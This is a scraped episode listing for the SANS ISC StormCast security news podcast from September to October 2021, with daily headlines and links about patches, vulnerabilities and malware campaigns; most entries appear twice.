Port Forwarding with Windows for the Win https://isc.sans.edu/forums/diary/PortForwarding+with+Windows+for+the+Win/27934/ Please Fix Your E-Mail Brute Forcing Tool https://isc.sans.edu/forums/diary/Please+fix+your+EMail+Brute+forcing+tool/27930/ Ad Blocker Injects Ads https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/ Romance Scams Go After Crypto Currency https://nakedsecurity.sophos.com/2021/10/13/romance-scams-with-a-cryptocurrency-twist-new-research-from-sophoslabs/ Sysmon For Linux https://github.com/Sysinternals/SysmonForLinux Foxit Updates https://www.foxit.com/support/security-bulletins.html VMWare Updates https://www.vmware.com/security/advisories/VMSA-2021-0023.html
10/15/20216 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, October 13th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2021+Patch+Tuesday/27928/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html PyPi Remove mitmproxy2 Module https://twitter.com/maximilianhils/status/1447525552370458625 https://web.archive.org/web/20211012105244/https://gist.github.com/mhils/7ff29d50b25a1c99e06834cf95684333
10/13/20215 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, October 13th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2021+Patch+Tuesday/27928/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html PyPi Remove mitmproxy2 Module https://twitter.com/maximilianhils/status/1447525552370458625 https://web.archive.org/web/20211012105244/https://gist.github.com/mhils/7ff29d50b25a1c99e06834cf95684333
10/13/20215 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, October 12th, 2021

Non HTTP Requests Hitting Web Server https://isc.sans.edu/forums/diary/Things+that+go+Bump+in+the+Night+Non+HTTP+Requests+Hitting+Web+Servers/27924/ Apple Updates iOS/iPadOS to 15.0.2 https://saaramar.github.io/IOMFB_integer_overflow_poc/ https://support.apple.com/en-us/HT212846 Weak SSH Keys Used with GitKraken https://github.blog/2021-10-11-github-security-update-revoking-weakly-generated-ssh-keys/ Let's Encrypt Outage https://letsencrypt.status.io/pages/incident/55957a99e800baa4470002da/6164b5af714e1f053880ba0c
10/12/20215 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, October 12th, 2021

Non HTTP Requests Hitting Web Server https://isc.sans.edu/forums/diary/Things+that+go+Bump+in+the+Night+Non+HTTP+Requests+Hitting+Web+Servers/27924/ Apple Updates iOS/iPadOS to 15.0.2 https://saaramar.github.io/IOMFB_integer_overflow_poc/ https://support.apple.com/en-us/HT212846 Weak SSH Keys Used with GitKraken https://github.blog/2021-10-11-github-security-update-revoking-weakly-generated-ssh-keys/ Let's Encrypt Outage https://letsencrypt.status.io/pages/incident/55957a99e800baa4470002da/6164b5af714e1f053880ba0c
10/12/20215 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, October 11th, 2021

Scanning for Previous Oracle WebLogic Vulnerabilities https://isc.sans.edu/forums/diary/Scanning+for+Previous+Oracle+WebLogic+Vulnerabilities/27918/ Sorting Things Out - Sorting Data by IP Address https://isc.sans.edu/forums/diary/Sorting+Things+Out+Sorting+Data+by+IP+Address/27916/ https://gitlab.com/slackermedia/bashcrawl Telegram Does Not Remove Auto-Deleted Messages from Cache https://habr.com/en/post/580582/ Microsoft To Disable Excel 4.0 Macros By Default https://twitter.com/GelosSnake/status/1446192775087722497 https://m365admin.handsontek.net/macro-settings-update-to-disable-excel-4-0-macros-by-default/
10/11/20215 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, October 11th, 2021

Scanning for Previous Oracle WebLogic Vulnerabilities https://isc.sans.edu/forums/diary/Scanning+for+Previous+Oracle+WebLogic+Vulnerabilities/27918/ Sorting Things Out - Sorting Data by IP Address https://isc.sans.edu/forums/diary/Sorting+Things+Out+Sorting+Data+by+IP+Address/27916/ https://gitlab.com/slackermedia/bashcrawl Telegram Does Not Remove Auto-Deleted Messages from Cache https://habr.com/en/post/580582/ Microsoft To Disable Excel 4.0 Macros By Default https://twitter.com/GelosSnake/status/1446192775087722497 https://m365admin.handsontek.net/macro-settings-update-to-disable-excel-4-0-macros-by-default/
10/11/20215 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, October 8th, 2021

Who is Hunting For Your IPTV Set-Top Box? https://isc.sans.edu/forums/diary/Who+Is+Hunting+For+Your+IPTV+SetTop+Box/27912/ Another Update For Apache https://httpd.apache.org Font on Lake Rootkit https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/ osquery 5 with macOS Endpoint Security https://www.trailofbits.com/post/announcing-osquery-5-now-with-endpointsecurity-on-macos
10/8/20216 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, October 8th, 2021

Who is Hunting For Your IPTV Set-Top Box? https://isc.sans.edu/forums/diary/Who+Is+Hunting+For+Your+IPTV+SetTop+Box/27912/ Another Update For Apache https://httpd.apache.org Font on Lake Rootkit https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/ osquery 5 with macOS Endpoint Security https://www.trailofbits.com/post/announcing-osquery-5-now-with-endpointsecurity-on-macos
10/8/20216 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, October 7th, 2021

Apache 2.4.49 Directory Traversal Vulnerability https://isc.sans.edu/forums/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908/ Python Ransomware Targeting ESXi Server https://www.sophos.com/en-us/press-office/press-releases/2021/10/sophos-researchers-uncover-new-python-ransomware-targeting-an-esxi-server-and-virtual-machines.aspx AT&T SIM Forensics https://medium.com/telecom-expert/what-is-at-t-doing-at-1111340002-c418876c212c Google Making Additional 2FA Push https://blog.google/technology/safety-security/making-sign-safer-and-more-convenient/
10/7/20215 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, October 7th, 2021

Apache 2.4.49 Directory Traversal Vulnerability https://isc.sans.edu/forums/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908/ Python Ransomware Targeting ESXi Server https://www.sophos.com/en-us/press-office/press-releases/2021/10/sophos-researchers-uncover-new-python-ransomware-targeting-an-esxi-server-and-virtual-machines.aspx AT&T SIM Forensics https://medium.com/telecom-expert/what-is-at-t-doing-at-1111340002-c418876c212c Google Making Additional 2FA Push https://blog.google/technology/safety-security/making-sign-safer-and-more-convenient/
10/7/20215 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, October 6th, 2021

Looking Glass Sites https://isc.sans.edu/forums/diary/Looking+Glasses+Debugging+Network+Connectivity+Issues/27904/ Facebook Postmortem https://engineering.fb.com/2021/10/05/networking-traffic/outage-details/ Apache 2.4.49 Directory Traversal Vulnerability https://blog.sonatype.com/apache-servers-actively-exploited-in-wild-importance-of-prompt-patching Windows 11 Released https://www.microsoft.com/security/blog/2021/10/04/windows-11-offers-chip-to-cloud-protection-to-meet-the-new-security-challenges-of-hybrid-work/ https://www.microsoft.com/en-us/download/details.aspx?id=55319
10/6/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, October 6th, 2021

Looking Glass Sites https://isc.sans.edu/forums/diary/Looking+Glasses+Debugging+Network+Connectivity+Issues/27904/ Facebook Postmortem https://engineering.fb.com/2021/10/05/networking-traffic/outage-details/ Apache 2.4.49 Directory Traversal Vulnerability https://blog.sonatype.com/apache-servers-actively-exploited-in-wild-importance-of-prompt-patching Windows 11 Released https://www.microsoft.com/security/blog/2021/10/04/windows-11-offers-chip-to-cloud-protection-to-meet-the-new-security-challenges-of-hybrid-work/ https://www.microsoft.com/en-us/download/details.aspx?id=55319
10/6/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, October 5th, 2021

Facebook Outage https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/ Boutique "Dark" Botnet Hunting for Crumbs https://isc.sans.edu/forums/diary/Boutique+Dark+Botnet+Hunting+for+Crumbs/27898/ Apache Airflow May Leak Credentials https://www.intezer.com/blog/cloud-security/misconfigured-airflows-leak-credentials/
10/5/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, October 5th, 2021

Facebook Outage https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/ Boutique "Dark" Botnet Hunting for Crumbs https://isc.sans.edu/forums/diary/Boutique+Dark+Botnet+Hunting+for+Crumbs/27898/ Apache Airflow May Leak Credentials https://www.intezer.com/blog/cloud-security/misconfigured-airflows-leak-credentials/
10/5/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, October 4th, 2021

A New Tool To Add to Your LOLBAS List: cvtres.exe https://isc.sans.edu/forums/diary/New+Tool+to+Add+to+Your+LOLBAS+List+cvtresexe/27892/ Google Chrome Continuing Updates https://support.google.com/chrome/answer/95414?hl=en&co=GENIE.Platform%3DDesktop Cyber Security Awareness Month https://www.sans.org/security-awareness-training/resources/ https://isc.sans.edu/tag.html?tag=csam FCC Attempts to Fight SIM Swapping https://docs.fcc.gov/public/attachments/DOC-376199A1.pdf MacOS Gatekeeper Bypass https://labs.f-secure.com/blog/the-discovery-of-cve-2021-1810/
10/4/20215 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, October 4th, 2021

A New Tool To Add to Your LOLBAS List: cvtres.exe https://isc.sans.edu/forums/diary/New+Tool+to+Add+to+Your+LOLBAS+List+cvtresexe/27892/ Google Chrome Continuing Updates https://support.google.com/chrome/answer/95414?hl=en&co=GENIE.Platform%3DDesktop Cyber Security Awareness Month https://www.sans.org/security-awareness-training/resources/ https://isc.sans.edu/tag.html?tag=csam FCC Attempts to Fight SIM Swapping https://docs.fcc.gov/public/attachments/DOC-376199A1.pdf MacOS Gatekeeper Bypass https://labs.f-secure.com/blog/the-discovery-of-cve-2021-1810/
10/4/20215 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, October 1st, 2021

Visa/Apple Express Transit Relay Attack https://www.bbc.com/news/technology-58719891 FluBot Offering Fake FlutBot Protection https://twitter.com/CERTNZ/status/1443701853665980440 Undetected Azure Active Directory Brute-Force Attacks https://www.secureworks.com/research/undetected-azure-active-directory-brute-force-attacks SANS.edu Student Christopher DeWees: Expired Domain Dumpster Diving https://www.sans.edu/cyber-research/40505/
10/1/202114 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, October 1st, 2021

Visa/Apple Express Transit Relay Attack https://www.bbc.com/news/technology-58719891 FluBot Offering Fake FlutBot Protection https://twitter.com/CERTNZ/status/1443701853665980440 Undetected Azure Active Directory Brute-Force Attacks https://www.secureworks.com/research/undetected-azure-active-directory-brute-force-attacks SANS.edu Student Christopher DeWees: Expired Domain Dumpster Diving https://www.sans.edu/cyber-research/40505/
10/1/202114 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, September 30th, 2021

Keeping Track of Time: Network Time Protocol and GPSD Bug https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/ Apple Airtags Stored XSS https://medium.com/@bobbyrsec/zero-day-hijacking-icloud-credentials-with-apple-airtags-stored-xss-6997da43a216 CISA/NSA Guidance To Configure VPNs https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF Facebook Open Sourcing "Mariana Trench" Tool To Analyze Android and Java Apps https://engineering.fb.com/2021/09/29/security/mariana-trench/
9/30/20215 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, September 30th, 2021

Keeping Track of Time: Network Time Protocol and GPSD Bug https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/ Apple Airtags Stored XSS https://medium.com/@bobbyrsec/zero-day-hijacking-icloud-credentials-with-apple-airtags-stored-xss-6997da43a216 CISA/NSA Guidance To Configure VPNs https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF Facebook Open Sourcing "Mariana Trench" Tool To Analyze Android and Java Apps https://engineering.fb.com/2021/09/29/security/mariana-trench/
9/30/20215 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, September 29th, 2021

TLS 1.3 and SSL: The Current State of Affairs https://isc.sans.edu/forums/diary/TLS+13+and+SSL+the+current+state+of+affairs/27882/ EFF Discontinues HTTPS Everywhere Plugin https://www.eff.org/deeplinks/2021/09/https-actually-everywhere Malicious CryptoCoin Wallet https://discourse.mozilla.org/t/got-hacked-by-the-add-on-called-safepal-wallet/85797 Microsoft Automates Exchange Mitigations https://techcommunity.microsoft.com/t5/exchange-team-blog/new-security-feature-in-september-2021-cumulative-update-for/ba-p/2783155
9/29/20215 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, September 29th, 2021

TLS 1.3 and SSL: The Current State of Affairs https://isc.sans.edu/forums/diary/TLS+13+and+SSL+the+current+state+of+affairs/27882/ EFF Discontinues HTTPS Everywhere Plugin https://www.eff.org/deeplinks/2021/09/https-actually-everywhere Malicious CryptoCoin Wallet https://discourse.mozilla.org/t/got-hacked-by-the-add-on-called-safepal-wallet/85797 Microsoft Automates Exchange Mitigations https://techcommunity.microsoft.com/t5/exchange-team-blog/new-security-feature-in-september-2021-cumulative-update-for/ba-p/2783155
9/29/20215 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, September 28th, 2021

Trend Micro ServerProtect Authentication Bypass Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-21-1115/ Let's Encrypt Root CA Expiration https://community.letsencrypt.org/t/production-chain-changes/150739 ERMAC Android Malware https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html QNAP Vulnerabilities https://www.qnap.com/en/security-advisory/QSA-21-35
9/28/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, September 28th, 2021

Trend Micro ServerProtect Authentication Bypass Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-21-1115/ Let's Encrypt Root CA Expiration https://community.letsencrypt.org/t/production-chain-changes/150739 ERMAC Android Malware https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html QNAP Vulnerabilities https://www.qnap.com/en/security-advisory/QSA-21-35
9/28/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, September 27th, 2021

Mobile Device Inventory via Active Sync https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+Users+Mobile+Devices+Simple+Inventory/27868/ Autodiscover Attacks https://autodiscover-vulnerable-tlds.com https://wiki.mozilla.org/Public_Suffix_List https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Three More 0-Day Vulnerabilities in iOS https://habr.com/en/post/579714/ original russian version: https://habr.com/en/post/579716/ Cisco CAPWAP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-capwap-rce-LYgj8Kf Sonicwall SMA 100 Series Vulnerablity https://www.sonicwall.com/support/product-notification/security-notice-critical-arbitrary-file-delete-vulnerability-in-sonicwall-sma-100-series-appliances/210819124854603/
9/27/20216 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, September 27th, 2021

Mobile Device Inventory via Active Sync https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Your+Users+Mobile+Devices+Simple+Inventory/27868/ Autodiscover Attacks https://autodiscover-vulnerable-tlds.com https://wiki.mozilla.org/Public_Suffix_List https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Three More 0-Day Vulnerabilities in iOS https://habr.com/en/post/579714/ original russian version: https://habr.com/en/post/579716/ Cisco CAPWAP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-capwap-rce-LYgj8Kf Sonicwall SMA 100 Series Vulnerablity https://www.sonicwall.com/support/product-notification/security-notice-critical-arbitrary-file-delete-vulnerability-in-sonicwall-sma-100-series-appliances/210819124854603/
9/27/20216 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, September 24th, 2021

Excel Recipe: Some VBA Code with a Touch of Excel4 Macro https://isc.sans.edu/forums/diary/Excel+Recipe+Some+VBA+Code+with+a+Touch+of+Excel4+Macro/27864/ Windows Platform Binary Table Weakness https://eclypsium.com/2021/09/20/everyone-gets-a-rootkit/ Apple Patches Older iOS/MacOS Versions https://support.apple.com/en-us/HT201222 Broken Digital Signatures Used to Foil Malware Detection https://blog.google/threat-analysis-group/financially-motivated-actor-breaks-certificate-parsing-avoid-detection/
9/24/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, September 24th, 2021

Excel Recipe: Some VBA Code with a Touch of Excel4 Macro https://isc.sans.edu/forums/diary/Excel+Recipe+Some+VBA+Code+with+a+Touch+of+Excel4+Macro/27864/ Windows Platform Binary Table Weakness https://eclypsium.com/2021/09/20/everyone-gets-a-rootkit/ Apple Patches Older iOS/MacOS Versions https://support.apple.com/en-us/HT201222 Broken Digital Signatures Used to Foil Malware Detection https://blog.google/threat-analysis-group/financially-motivated-actor-breaks-certificate-parsing-avoid-detection/
9/24/20215 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, September 23rd, 2021

An XML-Obfustcated Office Document (CVE-2021-40444) https://isc.sans.edu/forums/diary/An+XMLObfuscated+Office+Document+CVE202140444/27860/ Exchange Autodiscovering Leaks Credentials https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Nagios Vulnerabilities https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/ Apple Deprecating TLS 1.0/1.1 https://developer.apple.com/news/?id=bv8ur34d
9/23/20216 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, September 23rd, 2021

An XML-Obfustcated Office Document (CVE-2021-40444) https://isc.sans.edu/forums/diary/An+XMLObfuscated+Office+Document+CVE202140444/27860/ Exchange Autodiscovering Leaks Credentials https://www.guardicore.com/labs/autodiscovering-the-great-leak/ Nagios Vulnerabilities https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/ Apple Deprecating TLS 1.0/1.1 https://developer.apple.com/news/?id=bv8ur34d
9/23/20216 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, September 22nd, 2021

A First Look at Apple's iOS 15 "Private Relay" feature https://isc.sans.edu/forums/diary/A+First+Look+at+Apples+iOS+15+Private+Relay+feature/27858/ macOS Finder Security Feature Bypass Leads to Possible RCE https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/ VMWare vCenter Advisory https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html NetGear Circle Parental Control Vulnerablity https://blog.grimm-co.com/2021/09/mama-always-told-me-not-to-trust.html
9/22/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, September 22nd, 2021

A First Look at Apple's iOS 15 "Private Relay" feature https://isc.sans.edu/forums/diary/A+First+Look+at+Apples+iOS+15+Private+Relay+feature/27858/ macOS Finder Security Feature Bypass Leads to Possible RCE https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/ VMWare vCenter Advisory https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html NetGear Circle Parental Control Vulnerablity https://blog.grimm-co.com/2021/09/mama-always-told-me-not-to-trust.html
9/22/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, September 21st, 2021

OMIGOD Exploits Captured in the Wild. https://isc.sans.edu/forums/diary/OMIGOD+Exploits+Captured+in+the+Wild+Researchers+responsible+for+half+of+scans+for+related+ports/27852/ Apple iOS/iPadOS/tvOS 15 Updates (and WatchOS, Xcode, Safari) https://support.apple.com/en-us/HT201222 ManageEngine ADSelfService Plus Exploited https://us-cert.cisa.gov/ncas/alerts/aa21-259a
9/21/20216 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, September 21st, 2021

OMIGOD Exploits Captured in the Wild. https://isc.sans.edu/forums/diary/OMIGOD+Exploits+Captured+in+the+Wild+Researchers+responsible+for+half+of+scans+for+related+ports/27852/ Apple iOS/iPadOS/tvOS 15 Updates (and WatchOS, Xcode, Safari) https://support.apple.com/en-us/HT201222 ManageEngine ADSelfService Plus Exploited https://us-cert.cisa.gov/ncas/alerts/aa21-259a
9/21/20216 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, September 20th, 2021

Malicious Calendar Subscriptions Are Back https://isc.sans.edu/forums/diary/Malicious+Calendar+Subscriptions+Are+Back/27846/ Simple Analysis of a CVE-2021-40444 (MSHTML) Document https://isc.sans.edu/forums/diary/Simple+Analysis+Of+A+CVE202140444+docx+Document/27848/ Mirai Botnet Hunting OMIGOD https://twitter.com/1ZRR4H/status/1438580885142507528 https://isc.sans.edu/port.html?port=1270 Exploit for Netgear Flaws Available https://gynvael.coldwind.pl/?id=742
9/20/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, September 20th, 2021

Malicious Calendar Subscriptions Are Back https://isc.sans.edu/forums/diary/Malicious+Calendar+Subscriptions+Are+Back/27846/ Simple Analysis of a CVE-2021-40444 (MSHTML) Document https://isc.sans.edu/forums/diary/Simple+Analysis+Of+A+CVE202140444+docx+Document/27848/ Mirai Botnet Hunting OMIGOD https://twitter.com/1ZRR4H/status/1438580885142507528 https://isc.sans.edu/port.html?port=1270 Exploit for Netgear Flaws Available https://gynvael.coldwind.pl/?id=742
9/20/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, September 17th, 2021

Phishing 101: why depend on one suspicious message subject when you can use many https://isc.sans.edu/forums/diary/Phishing+101+why+depend+on+one+suspicious+message+subject+when+you+can+use+many/27842/ PrintNightmare Fix Breaks Network Printing https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/ Malware Taking Advantage of Linux Subsystem for Windows https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/ Travis CI Patch https://travis-ci.community/t/security-bulletin/12081 IBM System x IMM Vulnerability https://support.lenovo.com/es/en/product_security/len-66347 Fake iTerm installing Malware on OS X https://objective-see.com/blog/blog_0x66.html
9/17/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, September 17th, 2021

Phishing 101: why depend on one suspicious message subject when you can use many https://isc.sans.edu/forums/diary/Phishing+101+why+depend+on+one+suspicious+message+subject+when+you+can+use+many/27842/ PrintNightmare Fix Breaks Network Printing https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/ Malware Taking Advantage of Linux Subsystem for Windows https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/ Travis CI Patch https://travis-ci.community/t/security-bulletin/12081 IBM System x IMM Vulnerability https://support.lenovo.com/es/en/product_security/len-66347 Fake iTerm installing Malware on OS X https://objective-see.com/blog/blog_0x66.html
9/17/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, September 16th, 2021

Hancitor Campaign Abusing Microsoft's OneDrive https://isc.sans.edu/forums/diary/Hancitor+campaign+abusing+Microsofts+OneDrive/27838/ "Secret"Agent Exposes Azure Customers To Unauthorized Code Execution https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution
9/16/20215 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, September 16th, 2021

Hancitor Campaign Abusing Microsoft's OneDrive https://isc.sans.edu/forums/diary/Hancitor+campaign+abusing+Microsofts+OneDrive/27838/ "Secret"Agent Exposes Azure Customers To Unauthorized Code Execution https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution
9/16/20215 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, September 15th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+September+2021+Patch+Tuesday/27834/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
9/15/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, September 15th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+September+2021+Patch+Tuesday/27834/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
9/15/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, September 14th, 2021

Apple Updates Everything https://support.apple.com/en-us/HT201222 Citizenlab Discloses NSO Exploit Details https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/ Google Chrome Update https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html WooCommerce Multi Currency Plugin Vulnerablity https://blog.nintechnet.com/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin/
9/14/20215 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, September 14th, 2021

Apple Updates Everything https://support.apple.com/en-us/HT201222 Citizenlab Discloses NSO Exploit Details https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/ Google Chrome Update https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html WooCommerce Multi Currency Plugin Vulnerablity https://blog.nintechnet.com/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin/
9/14/20215 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, September 13th, 2021

Shipping Microsoft DNS Logs to Elasticsearch https://isc.sans.edu/forums/diary/Shipping+to+Elasticsearch+Microsoft+DNS+Logs/27828/ Exploit Generator for CVE-2021-40444 https://github.com/lockedbyte/CVE-2021-40444 Windows Lock Screen Bypass https://halove23.blogspot.com/2021/09/zdi-21-1053-bypassing-windows-lock.html Citrix Hypervisor Update https://support.citrix.com/article/CTX325319 GitHub Identifies Vulnerable node.js Packages https://github.blog/2021-09-08-github-security-update-vulnerabilities-tar-npmcli-arborist/
9/13/20215 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, September 13th, 2021

Shipping Microsoft DNS Logs to Elasticsearch https://isc.sans.edu/forums/diary/Shipping+to+Elasticsearch+Microsoft+DNS+Logs/27828/ Exploit Generator for CVE-2021-40444 https://github.com/lockedbyte/CVE-2021-40444 Windows Lock Screen Bypass https://halove23.blogspot.com/2021/09/zdi-21-1053-bypassing-windows-lock.html Citrix Hypervisor Update https://support.citrix.com/article/CTX325319 GitHub Identifies Vulnerable node.js Packages https://github.blog/2021-09-08-github-security-update-vulnerabilities-tar-npmcli-arborist/
9/13/20215 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, September 10th, 2021

ISC/DShield API Updates https://isc.sans.edu/forums/diary/Updates+to+Our+DatafeedsAPI/27824/ Update on Windows MSHTML Vulnerability https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/ GitHub Actions check-spelling community workflow GITHUB_TOKEN leakage https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md
9/10/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, September 10th, 2021

ISC/DShield API Updates https://isc.sans.edu/forums/diary/Updates+to+Our+DatafeedsAPI/27824/ Update on Windows MSHTML Vulnerability https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/ GitHub Actions check-spelling community workflow GITHUB_TOKEN leakage https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md
9/10/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, September 9th, 2021

Protonmail Correction https://protonmail.com/blog/climate-activist-arrest/ https://protonmail.com/privacy-policy "Stolen Images Evidence" Campaign Continues Pushing BazarLoader Malware https://isc.sans.edu/forums/diary/Stolen+Images+Evidence+Campaign+Continues+Pushing+BazarLoader+Malware/27816/ Thyotic Secret Server Critical Update https://docs.thycotic.com/ss/11.0.0/release-notes/ss-rn-11-0-000007.md Zoho Vulnerablity Exploited https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html
9/9/20215 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, September 9th, 2021

Protonmail Correction https://protonmail.com/blog/climate-activist-arrest/ https://protonmail.com/privacy-policy "Stolen Images Evidence" Campaign Continues Pushing BazarLoader Malware https://isc.sans.edu/forums/diary/Stolen+Images+Evidence+Campaign+Continues+Pushing+BazarLoader+Malware/27816/ Thyotic Secret Server Critical Update https://docs.thycotic.com/ss/11.0.0/release-notes/ss-rn-11-0-000007.md Zoho Vulnerablity Exploited https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html
9/9/20215 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, September 8th, 2021

Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 ProntonMail/VPN Releasing User's IP Address https://protonmail.com/blog/climate-activist-arrest/ What's App End To End Encryption Questioned (but upheld) https://twitter.com/evacide/status/1435288900587589632?s=20 PRIVATELOG and STASHLOG Malware Store Payload in Common Log File System (CLFS) https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
9/8/20215 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, September 8th, 2021

